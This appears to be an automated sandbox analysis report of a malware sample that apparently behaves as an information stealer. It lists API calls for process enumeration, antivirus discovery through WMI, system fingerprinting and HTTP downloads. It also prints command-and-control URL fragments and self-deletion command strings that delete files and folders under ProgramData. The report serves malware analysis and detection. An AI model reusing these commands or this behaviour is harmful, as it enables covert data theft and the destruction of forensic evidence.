Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

cowod., xrefs: 00417E7B
.exe, xrefs: 00417549
http://, xrefs: 00417E57
.exe, xrefs: 00417E04
hopto, xrefs: 00417E9F
_DEBUG.zip, xrefs: 00417F35
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 0041770C
org, xrefs: 00417EE7

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$_DEBUG.zip$b26735cbe8ca9e75712ffe3aa40c4a60$cowod.$hopto$http://$org
API String ID: 305159127-1499729979
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

true, xrefs: 004136A6
false, xrefs: 004136C5

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
\xA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

displayName, xrefs: 00411A6F
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AA0
WQL, xrefs: 00411A28
Unknown, xrefs: 00411A99
Unknown, xrefs: 00411AB4
Select * From AntiVirusProduct, xrefs: 00411A23

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & exit, xrefs: 00418389
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & rd /s /q "C:\ProgramData\, xrefs: 00418333
" & exit, xrefs: 004183DA

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

QuBi, xrefs: 00410A27
:\, xrefs: 00410A06
C, xrefs: 004109DF
wA, xrefs: 00410B21

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

%s\%s, xrefs: 004112D7
- , xrefs: 004113E6
?, xrefs: 00411263

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

